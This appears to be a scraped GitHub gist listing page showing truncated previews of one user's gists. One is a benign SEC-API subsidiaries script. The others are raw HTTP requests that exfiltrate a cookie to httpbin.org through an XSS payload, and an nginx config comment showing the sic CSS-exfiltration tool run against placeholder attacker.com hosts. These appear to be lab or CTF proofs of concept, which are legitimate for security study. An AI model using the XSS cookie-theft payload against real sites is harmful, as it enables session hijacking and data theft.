nbk2000 nbk2000
nbk2000
/ getSubsidiaries.py
Created
December 24, 2024 23:36
Get Subsidiaries of a Company from SEC API
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import sys | |
| API_KEY = 'API-KEY-GOES-HERE' | |
| # ANSI color codes | |
| BLUE = '\033[94m' | |
| RED = '\033[91m' | |
| PURPLE = '\033[95m' | |
| GREEN = '\033[92m' |
nbk2000
/ pwn.now.sh
Last active
May 9, 2019 15:04
GET based exfiltration of SECRET_KITTEN to httpbin.org via XSS
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| GET /?header=X-XSS-Protection%3A+0&head=&body=%3Cscript%3Ewindow.open%28%22https%3A%2F%2Fhttpbin.org%2Fget%3Fcookie%3D%22+%2B+document.cookie+%29%3C%2Fscript%3E HTTP/1.1 | |
| Host: pwn.now.sh | |
| Connection: close | |
| Cache-Control: max-age=0 | |
| Origin: https://pwn.now.sh | |
| Upgrade-Insecure-Requests: 1 | |
| User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3730.0 Safari/537.36 | |
| Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 | |
| Referer: https://pwn.now.sh/ | |
| Accept-Encoding: gzip, deflate |
nbk2000
/ pwn.now.sh
Last active
May 9, 2019 15:26
POST based exfiltration of SECRET_KITTEN to httpbin.org via XSS
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| POST / HTTP/1.1 | |
| Host: pwn.now.sh | |
| Connection: close | |
| Content-Length: 209 | |
| Cache-Control: max-age=0 | |
| Origin: https://pwn.now.sh | |
| Upgrade-Insecure-Requests: 1 | |
| Content-Type: application/x-www-form-urlencoded | |
| User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3730.0 Safari/537.36 | |
| Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Nginx Example Config for sic (Sequential Import Chaining) tool by @d0nutptr | |
| # | |
| # Should let Nginx terminate SSL/TLS connections for sic | |
| # assuming the sic tool is being run something like this: | |
| # | |
| # ./sic -p 3000 --ph "https://a.attacker.com" --ch "https://b.attacker.com" -t template_file | |
| # | |
| # NOTE: If you don't have a wildcard certificate, then you'll need to obtain | |
| # a certificate for the hostname used for the Polling (ph) and Callback (ch) hosts | |
| # |